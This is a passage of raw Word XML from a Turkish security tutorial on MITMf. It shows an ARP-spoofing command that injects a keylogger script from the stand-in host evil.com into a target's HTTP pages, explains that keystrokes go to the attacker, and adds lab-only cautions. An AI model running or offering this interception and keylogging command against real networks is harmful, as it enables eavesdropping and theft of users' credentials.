      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> + JS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>inject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> saldırı kombinasyonu gösterilmiştir:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6757A51A" w14:textId="60CD751E" w:rsidR="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mitmf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> --arp --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>spoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>gateway</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.1 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.105 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>inject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-url http://evil.com/keylogger.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B631437" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:r w:rsidRPr="00440B44">
        <w:t>Bu komut ne yapar?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630B5D17" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00440B44">
        <w:t>Hedef ve ağ geçidi arasındaki trafik ele geçirilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FF36C3" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00440B44">
        <w:t>HTTP sayfalarına “keylogger.js” adlı kötü amaçlı JS dosyası enjekte edilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE4B6E5" w14:textId="77777777" w:rsidR="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve">Hedefin tarayıcısında </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> çalıştırılır ve girilen tuşlar saldırgana gönderilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B086AE" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dikkat Edilmesi Gerekenler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2B882C" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:lastRenderedPageBreak/>
        <w:t>MITMf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> çok güçlü bir araçtır, bu yüzden yalnızca </w:t>
      </w:r>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>laboratuvar ve yasal ortamlarda</w:t>
      </w:r>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> kullanılmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D13B3FB" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve">HTTPS trafiği varsayılan olarak güvenlidir. HTTPS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>sniffing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> için </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>SSLStrip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> gibi ek modüller gerekebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ECA6A1" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00440B44">
        <w:t>Aktif saldırılar sırasında hedef cihazlar dengesiz çalışabilir veya ağ bağlantısı kesilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC177D5" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve">Bazı antivirüsler veya IDS/IPS sistemleri </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>MITMf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> trafiğini tespit edip engelleyebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A24C0E7" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44"/>
    <w:p w14:paraId="015D00A3" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46A997A5" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44"/>
    <w:p w14:paraId="4F828A4C" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44"/>
    <w:p w14:paraId="7F7E9950" w14:textId="77777777" w:rsidR="00440B44" w:rsidRDefault="00440B44"/>
    <w:sectPr w:rsidR="00440B4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7CC3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54DA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904AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC0C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925CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="538A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274212">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="658273250">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="134316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44"/>
    <w:rsid w:val="00000FA6"/>
    <w:rsid w:val="0044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DFF8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4606E258-5FA9-435D-8042-49ABA4A7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40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40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40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40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40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40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40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40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40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40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40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40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40B4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40B4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40B4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40B4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40B4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40B4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40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40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40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40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40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40B4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40B4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40B4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40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40B4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40B44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440B44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40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BERİL</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-23T12:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-23T12:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>